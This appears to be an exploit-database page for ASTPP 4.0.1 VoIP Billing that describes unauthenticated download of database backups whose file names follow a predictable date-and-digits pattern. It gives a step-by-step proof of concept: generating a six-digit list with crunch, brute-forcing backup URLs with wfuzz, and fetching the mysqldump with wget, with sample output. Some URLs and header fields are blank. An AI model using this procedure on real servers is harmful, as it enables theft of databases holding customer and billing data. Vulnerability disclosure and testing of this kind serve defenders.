Astpp 4.0.1 voip billing database backup download Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2020-01-10 | Type : webapps | Platform : linux
This exploit / vulnerability Astpp 4.0.1 voip billing database backup download is for educational purposes only and if it is used you will do on your own risk!

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# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
# Date: 2019-11-18
# Exploit Author: Fabien AUNAY
# Vendor Homepage:
# Software Link:
# Version: 4.0.1 vendor default setup script
# Tested on: Debian 9 - CentOS 7
# CVE : -

ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download

A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
It is available as an open source solution. It means without any investment, one can start his telephony
business using ASTPP.
ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
solution to “A Smart TelePhony Platform”.
The latest version of ASTPP is provisioned with some advanced functional modules which are designed
to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart

When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.

The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz

Pattern review:
- astpp_
- year
- month
- day
- 6 PIN digit

Objective 1 : Generate your 6 PIN list
Objective 2 : FUZZ the target URL
Objective 3 : Download the mysqldump


Objective 1: Generate your 6 PIN list
POC: crunch 6 6 0123456789 > pin_fuzzer.list

Objective 2 : FUZZ the target URL
POC: wfuzz --hc 302 -w pin_fuzzer.list ''
ID Response Lines Word Chars Payload

000080137: 200 1135 L 6859 W 550239 Ch "080136"

Objective 3 : Download the mysqldump
POC: wget
astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3